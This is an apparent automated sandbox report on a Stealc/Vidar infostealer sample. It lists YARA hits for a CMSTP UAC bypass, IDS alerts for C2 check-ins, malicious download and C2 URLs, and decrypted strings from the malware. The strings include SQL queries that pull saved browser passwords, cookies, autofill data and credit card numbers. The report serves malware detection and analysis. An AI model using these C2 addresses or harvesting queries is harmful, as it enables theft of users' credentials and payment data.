13.2.run.exe.3ea2d5b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
6.2.cmd.exe.56bb264.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.56bb264.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
6.2.cmd.exe.5677976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.5677976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
5.2.run.exe.3c1ad5b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.run.exe.3c1ad5b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
14.2.cmd.exe.57b4264.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.57b4264.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
17.0.u3bs.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 46 entries

Snort Signatures

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.172.128.90

Timestamp:	04/27/24-02:18:57.298293
SID:	2856233
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/27/24-02:19:03.852745
SID:	2051831
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-02:19:02.778873
SID:	2044243
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-02:19:03.279794
SID:	2044244
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/27/24-02:19:03.561564
SID:	2051828
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-02:19:03.564460
SID:	2044246
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.228/ping.php?substr=eight	Avira URL Cloud: Label: malware
Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\osssciedmed	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: u3bs.0.exe.6808.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.172.128.228/BroomSetup.exe	Virustotal: Detection: 22%	Perma Link
Source: 185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 16%	Perma Link
Source: http://185.172.128.228/ping.php?substr=eight	Virustotal: Detection: 18%	Perma Link
Source: http://185.172.128.203/tiktok.exe	Virustotal: Detection: 19%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll#	Virustotal: Detection: 8%	Perma Link
Source: http://185.172.128.203/tiktok.exe00	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll	Virustotal: Detection: 8%	Perma Link
Source: http://185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 16%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/msvcp140.dllQ	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.59/syncUpd.exe	Virustotal: Detection: 22%	Perma Link
Source: http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0	Virustotal: Detection: 20%	Perma Link
Source: http://185.172.128.203/tiktok.exet-Disposition:	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Virustotal: Detection: 72%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	Virustotal: Detection: 72%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\osssciedmed	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\osssciedmed	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Virustotal: Detection: 39%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for submitted file

Source: TNQTc6Qmkg.exe	ReversingLabs: Detection: 47%
Source: TNQTc6Qmkg.exe	Virustotal: Detection: 44%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\osssciedmed	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TNQTc6Qmkg.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: lstrcatA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: OpenEventA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateEventA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CloseHandle
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Sleep
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: VirtualFree
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: lstrlenA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ExitProcess
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: user32.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateDCA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sscanf
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HAL9TH
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: JohnDoe
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DISPLAY
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: http://185.172.128.76
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: /15f649199f40275b/
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: default10
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GlobalLock
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HeapFree
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetFileSize
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GlobalSize
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Process32Next
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Process32First
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: LocalFree
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: FindClose
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ReadFile
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: WriteFile
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateFileA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CopyFileA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetLastError
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GlobalFree
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: OpenProcess
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ole32.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: wininet.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: shell32.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: psapi.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SelectObject
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BitBlt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DeleteObject
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GdipFree
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CoInitialize
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetDC
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CloseWindow
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: wsprintfA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CharToOemW
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: wsprintfW
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: StrStrA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RmStartSession
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RmGetList
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: RmEndSession
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: encrypted_key
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: PATH
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: NSS_Init
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: browser:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: profile:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: url:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: login:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: password:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Opera
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: OperaGX
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Network
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: cookies
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: .txt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: TRUE
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: FALSE
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: autofill
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: history
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: name:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: month:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: year:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: card:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Cookies
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Login Data
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Web Data
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: History
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: logins.json
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: usernameField
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: guid
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: places.sqlite
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: plugins
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: IndexedDB
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Opera Stable
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: CURRENT
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Local State
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: profiles.ini
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: chrome
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: opera
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: firefox
